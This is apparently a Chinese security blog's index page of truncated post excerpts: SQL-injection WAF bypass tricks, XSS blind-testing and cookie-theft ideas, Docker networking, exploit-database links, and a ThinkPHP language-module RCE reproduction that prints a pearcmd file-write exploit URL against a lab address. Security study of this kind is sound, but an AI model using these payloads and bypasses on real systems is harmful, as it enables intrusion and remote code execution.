SQL注入WAF绕过和Tamper编写

参考业内大佬的经验汇总此文,绕过方法比较古老,仅供学习和研究。1 SQL注入绕过SQL注入遇到WAF时如何绕过?常见的绕过思路:1.1 绕过空格过滤采用url编码代替空格:%20 %09 %0a %0b %0c %0d %a0 %00注释符和内联注释:/**/,/!/用()、+代替空格用--%0a代替空格用emoji方式去代替空格1.2 绕过单引号过滤使用\转义,如1\'aaaa

- 阅读全文 -

关于XSS

EZXSS 一款XSS盲打漏洞测试工具http://caidaome.com/?post=205一些漏洞点及骚思路新用户注册存储型XSS盲打获取Cookiehttps://baijiahao.baidu.com/s?id=1700829679816535168&wfr=spider&for=pc文件上传存储型XSS盲打获取Cookiehttps://cloud.tencent.com/develo

- 阅读全文 -

不同docker容器网络通信

创建一个网卡连接两个容器要让Docker容器之间跨不同的子网(例如,172.17.0.0/24和172.22.222.0/24)进行通信,您可以使用Docker的网络功能来连接这些容器。这里有一种方法来实现它:创建自定义的Docker网络:首先,您可以创建一个自定义的Docker网络,这将允许不同子网的容器相互通信。假设您要创建名为"my_custom_network"的网络:docker net

- 阅读全文 -

不收藏一定会后悔的11个国外网络安全资源

0dayTodayhttps://0day.today/号称世界上最大的漏洞利用数据库Packetstormhttps://packetstormsecurity.com/不用过多介绍,强大的漏洞库和情报Deepquest's BlogDeepquest的个人博客,包含新漏洞信息和情报https://deepquest.code511.com/blog/Cxsecurityhttps://cxse

- 阅读全文 -

【漏洞复现】ThinkPHP 多语言模块RCE

Exp# 写文件 http://172.17.0.2/public/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?=phpinfo()?>+/tmp/hello.php # 包含文件 http://172.17.0.2/public/index.p

- 阅读全文 -